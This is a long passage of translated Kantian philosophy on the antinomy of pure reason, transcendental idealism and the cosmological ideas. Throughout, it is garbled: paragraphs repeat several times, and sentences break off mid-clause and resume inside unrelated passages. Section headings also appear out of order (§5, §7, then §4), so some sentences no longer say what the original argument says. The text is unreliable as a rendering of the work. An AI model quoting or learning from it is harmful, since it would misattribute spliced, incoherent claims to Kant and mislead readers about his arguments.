The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are determinable according to laws of the unity of experience, are entitled objects. The non-sensible cause of these representations is completely unknown to us, and cannot therefore be intuited by us as object. For such an object would have to be represented as neither in space nor in time (these being merely conditions of sensible representation), and apart from such conditions we cannot think any intuition. We may, however, entitle the purely intelligible cause of appearances in general the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions, and can say that it is given in itself prior to all experience. But the appearances, while conforming to it, are not given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, a regress in the series of all its conditions is likewise given; objects of the senses are given as conditioned; therefore, etc. Through this syllogism, the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, a regress in the series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, the entire series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance, applies also to all the others. The series of conditions is only to be met with in the regressive synthesis itself, not in the [field of] appearance viewed as a thing given in and by itself, prior to all regress. We must therefore say that the number of parts in a given appearance is in itself neither finite nor infinite. For an appearance is not something existing in itself, and its parts are first given in and through the regress of the decomposing synthesis, a regress which is never given in absolute completeness, either as finite or as infinite. This also holds of the series of subordinated causes, and of the series that proceeds from the conditioned to unconditioned necessary existence. These series can never be regarded as being in themselves in their totality either finite or infinite. Being series of subordinated causes, and of the series that proceeds from the conditioned to unconditioned necessary existence. These series can never be regarded as being in themselves in their totality either finite or infinite. Being series of subordinated representations, they exist only in the dynamical regress, and prior to this regress can have no existence in themselves as self-subsistent series of things.

Thus the antinomy of pure reason in its cosmological ideas vanishes when it is shown that it is merely dialectical, and that it is a conflict due to an illusion which arises from our applying to appearances that exist only in our representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge just where true insight and knowledge cease, and to represent as furthering speculative interests that which is valid only in relation to practical interests (in order, as may suit their convenience, to break the thread of physical enquiries, and then under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience.

Nothing is really given us save perception and the empirical advance from this to other possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation whatsoever, we can and must regard the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis of appearances. If from our own concepts we are unable to assert and determine anything certain, we must not throw the blame upon the object as concealing itself from us. Since such an object is nowhere to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which involves us in such difficulty? Is it, perchance, appearances that demand explanation, and do we, in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding finds not the least difficulty in the idea of the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis it is always necessary that the unconditioned be an empirical concept. Consequently, a limited world is too small for our concept.

Secondly, if every appearance in space (matter) consists of infinitely many parts, the regress in the division will always be too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our concept, which, consisting as it does in a successive regress, that idea of absolute totality which holds only as a condition of things in themselves. From this antinomy we can, however, obtain, not indeed a dogmatic, but a critical and doctrinal advantage. It affords indirect proof of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental ideality.

This remark is of some importance. It enables us to see that the proofs given in the fourfold antinomy are not merely baseless deceptions. On the supposition that appearances, and the sensible world which comprehends them all, are things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL DIALECTIC

We have sufficiently proved in the Transcendental Aesthetic that everything intuited in space or time, and therefore all objects of any experience possible to us, are nothing but appearances, that is, mere representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of possible perceptions in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience.

Nothing is really given us save perception and the empirical advance from this to other possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses. While the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of magnitude in the [field of] appearance, applies also to all the others. The series of conditions is only to be met with in the regressive synthesis itself, not in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, is necessarily led up to them whenever it endeavours to free from all conditions and apprehend in its unconditioned totality that which according to the rules of experience can never be determined save as conditioned.

These pseudo-rational assertions are so many attempts to solve four natural and unavoidable problems of reason. There are just so many, neither more nor fewer, owing to the fact that there are just four series of synthetic presuppositions which impose a priori limitations on the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis are of such a kind that they render the completion of the edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with a rule, to know what is right and what is wrong, since this concerns our obligation, and we have no obligation to that which we cannot know. In the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, the entire series of all its conditions is likewise given; objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience in its absolute completeness. Since the objects are nothing but mere representations, only in such a possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

